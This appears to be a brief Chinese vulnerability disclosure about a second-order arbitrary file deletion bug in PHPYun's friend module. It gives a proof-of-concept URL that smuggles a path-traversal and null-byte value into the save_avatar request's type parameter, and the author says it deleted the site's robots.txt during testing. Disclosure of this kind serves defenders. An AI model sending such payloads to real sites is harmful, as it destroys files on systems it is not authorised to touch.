php任意文件删除漏洞 phpyun二次任意文件删除漏洞

### 简要描述：

只要有任意文件删除 这系统绝对崩。

我吐个槽，最新的过滤文件实在是太BT了，只要有select and .... 就die()

伤不起啊

### 详细说明：

问题出在 friend\model\index.class.php

[](/upload/01/0119250873aadf723cab3eb6a38f52ad7625cdfa.jpg)

[](/upload/01/01192734913d89637618e20dc388128d83ee7a80.jpg)

### 漏洞证明：

1.注册个用户

2.访问 /friend/index.php?C=save_avatar&task=save_avatar&type=big/../../../robots.txt%00&photoServer=/upload/friend/0101/13887792315.JPG&from=icon&photoId=13887792315.JPG

访问2次,因为第一次 没有update到表里面 第二次查询出来 就删除了.

很抱歉 把robots.txt 删除了测试而已